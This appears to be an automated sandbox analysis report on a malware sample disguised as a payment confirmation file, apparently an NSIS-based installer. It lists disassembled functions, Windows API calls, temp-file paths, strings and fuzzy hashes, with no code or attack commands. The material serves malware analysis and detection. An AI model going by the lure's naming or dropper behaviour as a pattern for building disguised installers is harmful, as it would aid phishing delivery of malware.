Instruction ID: 0122bdc4cc194b68d617bf21deccaf32741d68d09ea49b6ef8aede989cb0ca1f
Opcode Fuzzy Hash: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
Instruction Fuzzy Hash: F9219D71900618FACF119FA5DD84ACFBFB9EF45364F10843AF904B62A0C7794A419FA8

Function 00403033 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 0040304E
GetTickCount.KERNEL32 ref: 0040306C
wsprintfW.USER32 ref: 0040309A

Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2

CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 004030BE
ShowWindow.USER32(00000000,00000005), ref: 004030CC

Part of subcall function 00403017: MulDiv.KERNEL32(00000000,00000064,000025B1), ref: 0040302C

Strings

... %d%%, xrefs: 00403094

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 08ac34a4e5fc7f4836fd10a2a84a83e51d98fc20e7055cc4174bcdc419dd85dd
Instruction ID: 5115fc65002d889466af77c95cd87ea57bd417394e766d10746fa218fe5c3c06
Opcode Fuzzy Hash: 08ac34a4e5fc7f4836fd10a2a84a83e51d98fc20e7055cc4174bcdc419dd85dd
Instruction Fuzzy Hash: CA01C830642610E7CB31AF50AE09A6B3FACAB04706F64043BF441B11D9D6B85A51CF9D

Function 00404FBC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FD7
GetMessagePos.USER32 ref: 00404FDF
ScreenToClient.USER32(?,?), ref: 00404FF9
SendMessageW.USER32(?,00001111,00000000,?), ref: 0040500B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405031

Strings

f, xrefs: 0040500D

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction ID: f32abc49a7be06d84d864a503b70a66925f192d82b82ee1d40ead4c3c6165fb8
Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction Fuzzy Hash: 79015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B4AA058BA5

Function 00402F98 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402FB6
wsprintfW.USER32 ref: 00402FEA
SetWindowTextW.USER32(?,?), ref: 00402FFA
SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300C

Strings

unpacking data: %d%%, xrefs: 00402FD8, 00402FE8
verifying installer: %d%%, xrefs: 00402FDF

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
Instruction ID: 34bde3d48a8f942e304b41271f5ed33cd318c4bcfffe3c394610842cbdf8d478
Opcode Fuzzy Hash: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
Instruction Fuzzy Hash: 10F0317054020CABEF249F60DD4ABEE3B68EB40349F00C03AF606B51D0DBB99A55DB99

Function 6E312655 Relevance: 9.1, APIs: 6, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 6E3112BB: GlobalAlloc.KERNELBASE(00000040,?,6E3112DB,?,6E31137F,00000019,6E3111CA,-000000A0), ref: 6E3112C5

GlobalFree.KERNEL32(?), ref: 6E312743
GlobalFree.KERNEL32(00000000), ref: 6E312778

Memory Dump Source

Source File: 00000000.00000002.3573405081.000000006E311000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E310000, based on PE: true

Associated: 00000000.00000002.3573385773.000000006E310000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3573419200.000000006E314000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3573433511.000000006E316000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e310000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 60e0ef9d0c479f1f7a6bf638784a61b8a012fc2d3f20d5b36447f6a4ce78d5f2
Instruction ID: 421ac938bb8c22436da469afd32580aeea88b2a9848853268c8aab397decc8f9
Opcode Fuzzy Hash: 60e0ef9d0c479f1f7a6bf638784a61b8a012fc2d3f20d5b36447f6a4ce78d5f2
Instruction Fuzzy Hash: B431BE7150C601EFCB198FD5CA85CEBB7BEEB8B344325496CF14083661C7325806EB61

Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
GlobalFree.KERNEL32(?), ref: 00402A0B
GlobalFree.KERNEL32(00000000), ref: 00402A1E
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
Instruction ID: 0665ed67c6e74a6a0a4f3ff5189880cf350c83190f31c90c7548f1ee6fedf688
Opcode Fuzzy Hash: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
Instruction Fuzzy Hash: 5731CF71D00124BBCF21AFA5CD89D9E7EB9AF48364F10023AF511762E1CB794C429B98

Function 00404EAE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
wsprintfW.USER32 ref: 00404F58
SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B

Strings

H/B, xrefs: 00404F41
%u.%u%s%s, xrefs: 00404F39

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$H/B
API String ID: 3540041739-2222257793
Opcode ID: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
Instruction ID: 614c6b03a1206c52a907a8f7c7d2435543e043070c0789599254521b237785a9
Opcode Fuzzy Hash: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
Instruction Fuzzy Hash: D911D5336041287BDB00666D9C45E9E329CEB85374F254637FA25F31D1EA79C82282E8

Function 6E311979 Relevance: 7.7, APIs: 5, Instructions: 194COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(?), ref: 6E3119DA
GlobalFree.KERNEL32(?), ref: 6E311B7A
GlobalFree.KERNEL32(?), ref: 6E311B7F

Memory Dump Source

Source File: 00000000.00000002.3573405081.000000006E311000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E310000, based on PE: true

Associated: 00000000.00000002.3573385773.000000006E310000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3573419200.000000006E314000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3573433511.000000006E316000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e310000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 1b1ce722b8315936e4b94504a79954f3509af1dd268c760a9691c21f125da198
Instruction ID: dba39ec0e30e6c542252e17ed32951274c3df816f53ff839fcb28062cef93d91
Opcode Fuzzy Hash: 1b1ce722b8315936e4b94504a79954f3509af1dd268c760a9691c21f125da198
Instruction Fuzzy Hash: C251E332D1C109AECB9C9FE9C4405EEBBBDEB65304F01C55ED400A3218F772AA4D87A1

Function 6E312480 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 6E3125C2

Part of subcall function 6E3112CC: lstrcpynW.KERNEL32(00000000,?,6E31137F,00000019,6E3111CA,-000000A0), ref: 6E3112DC

GlobalAlloc.KERNEL32(00000040), ref: 6E312548
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6E312563

Memory Dump Source

Source File: 00000000.00000002.3573405081.000000006E311000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E310000, based on PE: true

Associated: 00000000.00000002.3573385773.000000006E310000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3573419200.000000006E314000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3573433511.000000006E316000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e310000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 6cf2946bee49152452ef271ccba7443e13141583acff0f6124946af034cfca9d
Instruction ID: fbe146d2d979fa15b238cc77bfc7bcbfa71301fc88809eeef9c13e47e51068af
Opcode Fuzzy Hash: 6cf2946bee49152452ef271ccba7443e13141583acff0f6124946af034cfca9d
Instruction Fuzzy Hash: 2941DCB000C705EFDB18DFA9E980AE6B7BCFB56304F10495DE48687580EB31A559EBB1

Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9F
GetClientRect.USER32(?,?), ref: 00401DEA
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
DeleteObject.GDI32(00000000), ref: 00401E3E

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
Instruction ID: 305ae2269dae07fc62aa10ca295236b4d3f8ba7b944ef9ab65218e6e9e6ea469
Opcode Fuzzy Hash: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
Instruction Fuzzy Hash: FE210772A04119AFCB15DF98DE45AEEBBB5EF08304F14003AF945F62A0D7789D81DB98

Function 00401E53 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E56
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
ReleaseDC.USER32(?,00000000), ref: 00401E89
CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED8

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 0c77369168bd7cf80ce1876f53bc619ac932c7fdeb75926795b65e903bb74869
Instruction ID: 3094fbe596e336cf4bf26b394f16fb1ed862d687e7810168c788cd964747d1d2
Opcode Fuzzy Hash: 0c77369168bd7cf80ce1876f53bc619ac932c7fdeb75926795b65e903bb74869
Instruction Fuzzy Hash: 74018871904240EFE7005BB4EE99BDD3FB4AF15301F20997AF581B62E2C6B904859BED

Function 6E3116BD Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6E3122D8,?,00000808), ref: 6E3116D5
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6E3122D8,?,00000808), ref: 6E3116DC
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6E3122D8,?,00000808), ref: 6E3116F0
GetProcAddress.KERNEL32(6E3122D8,00000000), ref: 6E3116F7
GlobalFree.KERNEL32(00000000), ref: 6E311700

Memory Dump Source

Source File: 00000000.00000002.3573405081.000000006E311000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E310000, based on PE: true

Associated: 00000000.00000002.3573385773.000000006E310000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3573419200.000000006E314000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3573433511.000000006E316000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e310000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: ec250e67548038f66a12e9ac0588a2bfc407a0330583f0abd8d7ae6aec0928d8
Instruction ID: 50e561e91e0ae094389fca1eb60ed5808c443e6575c1f523bf323b8c24248a33
Opcode Fuzzy Hash: ec250e67548038f66a12e9ac0588a2bfc407a0330583f0abd8d7ae6aec0928d8
Instruction Fuzzy Hash: 90F037721065387FDA2016A79C4DCDBBE9CDF8B6F9B120369F718D219085614D02D7F1

Function 00405FFC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,?,00406070,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"), ref: 0040600A
CharNextW.USER32(00000000), ref: 0040600F
CharNextW.USER32(00000000), ref: 00406027

Strings

C:\Users\user\AppData\Local\Temp\nsa1392.tmp, xrefs: 00405FFD

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nsa1392.tmp
API String ID: 3213498283-1847755183
Opcode ID: fbda1c126528e77f8eb1d19cbf263a4f79599cb979c26f3e0093e3aefe43dd94
Instruction ID: 6b36e5aaf6ec4384ffc5acae3f619c12edb839be27b3f0f06f1fa7befb24a934
Opcode Fuzzy Hash: fbda1c126528e77f8eb1d19cbf263a4f79599cb979c26f3e0093e3aefe43dd94
Instruction Fuzzy Hash: 00F0963198061595DE31F6584C45A7767BCDF55394B02807BE602B71C1D7B888E186DA

Function 00405F51 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405F57
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405F61
lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405F73

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F51

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction ID: a99b79add3f29df6de165ac7772d062030ca4d7d7db28986cd5f5f8a2b4e36b3
Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction Fuzzy Hash: C9D0A731101934AAC211AF548D04CDF639C9F463443414C3BF501B30A1CB7D6D6287FD

Function 6E3110E1 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 6E311171
GlobalAlloc.KERNEL32(00000040,?), ref: 6E3111E3
GlobalFree.KERNEL32 ref: 6E31124A
GlobalFree.KERNEL32(?), ref: 6E31129B
GlobalFree.KERNEL32(00000000), ref: 6E3112B1

Memory Dump Source

Source File: 00000000.00000002.3573405081.000000006E311000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E310000, based on PE: true

Associated: 00000000.00000002.3573385773.000000006E310000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3573419200.000000006E314000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3573433511.000000006E316000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e310000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 925fc45a0aa505b9091cad085ddbdbc9112defbd2743478e9e1d4a2513f47f3a
Instruction ID: 9527a0c1ad3e6e7b3c1ec27a1a500f512e969349e74c345ce430e7e6833f4743
Opcode Fuzzy Hash: 925fc45a0aa505b9091cad085ddbdbc9112defbd2743478e9e1d4a2513f47f3a
Instruction Fuzzy Hash: 4C51F0B5808202EFDB08CFE8C845AD6B7ACFB2A345B20456DF840DBA00E731DD09CB60

Function 00402643 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa1392.tmp\System.dll), ref: 0040269A

Strings

C:\Users\user\AppData\Local\Temp\nsa1392.tmp\System.dll, xrefs: 0040265E, 00402683, 00402695, 004026E1
C:\Users\user\AppData\Local\Temp\nsa1392.tmp, xrefs: 00402688

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

